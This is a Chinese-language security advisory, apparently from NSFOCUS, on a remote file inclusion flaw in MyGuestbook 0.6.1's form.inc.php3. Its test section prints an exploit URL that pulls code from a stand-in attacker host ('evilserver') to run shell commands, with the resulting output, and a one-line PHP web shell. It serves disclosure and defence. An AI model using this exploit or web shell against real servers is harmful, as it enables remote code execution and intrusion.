首页 -> 安全研究

安全研究

安全漏洞
MyGuestbook form.inc.php3远程文件包含漏洞

发布日期:2005-07-06
更新日期:2005-07-06

受影响系统:
MyGuestBook MyGuestBook 0.6.1
描述:
BUGTRAQ  ID: 14155

MyGuestbook是使用MySQL/PostgreSQL和PHP3的简单的留言簿。

MyGuestbook中存在远程文件包含漏洞,攻击者可能利用这个漏洞以Web server进程的权限执行任意服务器端脚本。

起因是没有正确的过滤用户输入。

<*来源:SoulBlack Security Research (group@soulblack.com.ar
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=112059876828730&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<?
include("$lang.lang.inc.php3");
?>

/*

http://server/gb/form.inc.php3?lang=http://evilserver/cmd.gif?&cmd=id;uname%20-a;uptime

uid=99(nobody) gid=99(nobody) groups=99(nobody) Linux cyan-1.farm.de
2.4.18custom_ko_w_ipsec #10 Fre Apr 19 13:05:46 CEST 2002 i686 unknown 6:51pm
up 463 days, 15:43, 0 users, load average: 0.00, 0.01, 0.02

*/

/*
-------
cmd.gif
-------

<?
system($cmd);
?>

*/

建议:
厂商补丁:

MyGuestBook
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://html-design.com/

浏览次数:5660
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客